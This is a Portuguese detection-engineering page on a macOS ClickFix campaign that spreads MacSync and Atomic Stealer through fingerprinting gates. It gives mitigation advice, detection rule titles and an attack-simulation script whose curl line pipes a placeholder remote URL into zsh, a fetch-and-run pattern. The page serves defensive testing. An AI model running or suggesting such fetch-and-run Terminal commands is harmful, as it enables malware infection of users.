Campanha ClickFix do macOS Evolui com Portões de Infecção Ocultos
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma campanha do ClickFix para macOS está distribuindo ladrões de dados, incluindo MacSync e Atomic Stealer (AMOS), através de um sofisticado portal de impressão digital no lado do servidor. A operação utiliza domínios gerados algoritmicamente e impressão digital do navegador para garantir que cargas maliciosas sejam entregues apenas a usuários genuínos de macOS, ajudando a evitar análises de segurança automatizadas e rastreadores. Esta evolução marca uma mudança de engenharia social ampla para técnicas de entrega altamente direcionadas e ocultas.
Investigação
A Inteligência de Ameaças da Microsoft rastreou um cluster de mais de 250 domínios compartilhando um padrão de nomenclatura distinto para descobrir a campanha. A investigação revelou uma transição da entrega direta de iscas para um processo de duas etapas envolvendo perfilagem leve em JavaScript. Avaliando sinais WebGL, offsets de fuso horário e verificações anti-análise, os pesquisadores determinaram como a infraestrutura seleciona alvos em ambientes macOS enquanto apresenta conteúdo disfarce benigno a requisições não qualificadas.
Mitigação
As organizações devem educar os usuários de que atualizações legítimas de software não requerem colagem de comandos no Terminal. As equipes de segurança devem monitorar atividades suspeitas no Terminal envolvendo utilitários como curl, base64, gunzip, ou osascript, particularmente quando desencadeadas após a navegação na web. Fortalecer proteções em torno dos dados do Keychain e monitorar arquivamentos não autorizados de arquivos sensíveis também pode reduzir o impacto de um comprometimento bem-sucedido.
Resposta
Se a execução suspeita no Terminal ou o acesso não autorizado a armazenamentos de credenciais for detectado, os respondedores devem isolar imediatamente o ponto final macOS afetado. Investigue conexões de saída para domínios de baixa reputação, com atenção especial para padrões de requisição /curl/ . Hosts de estágio maliciosos identificados devem ser bloqueados, e o histórico recente do shell deve ser revisado para execução de comandos codificados ou ofuscados.
Fluxo de Ataque
Detecções
Tentativa Suspeita de Execução do Curl [MacOS] (via linha de comando)
Proof of Value
Comando e Controle Suspeitos por Pedido DNS de Domínio de Nível Superior Incomum (TLD) (via dns)
Proof of Value
Manipulação Possível de Strings Codificadas em Base64 [MacOS] (via linha de comando)
Proof of Value
Detectar Conexões de Saída para Domínios Suspeitos e Geografia/Navegadores Inesperados [Firewall]
Proof of Value
Execução Maliciosa de Comando no Terminal do macOS via Campanha ClickFix [Criação de Processo no Linux]
Proof of Value
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria e Base deve ter passado.
Justificação: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa do Ataque & Comandos: O adversário inicia uma campanha ClickFix apresentando uma mensagem de erro falsa em um navegador web, instruindo o usuário a “Corrigir o erro” colando um comando específico no Terminal. O objetivo do atacante é estabelecer persistência ou baixar malware. O comando utiliza
curlpara extrair uma carga maliciosa do AppleScript de um servidor remoto e canaliza paraosascript -epara executá-lo imediatamente na memória, contornando a varredura tradicional baseada em arquivos. -
Script de Teste de Regressão:
# Simulação do ClickFix: Buscando uma carga útil e executando via osascript # Nota: Usamos um comando de eco inócuo para simular a carga útil remota para evitar uma infecção real. curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "display dialog "Alerta de Segurança: Atualização de Sistema Requerida""' # Para garantir que a regra de detecção seja acionada, executamos o padrão exato: osascript -e 'say "Este é um ataque simulado"' -
Comandos de Limpeza:
# Nenhum arquivo é gravado em disco nesta execução de linha de comando específica, # mas garantimos que qualquer processo em segundo plano seja encerrado. killall osascript || true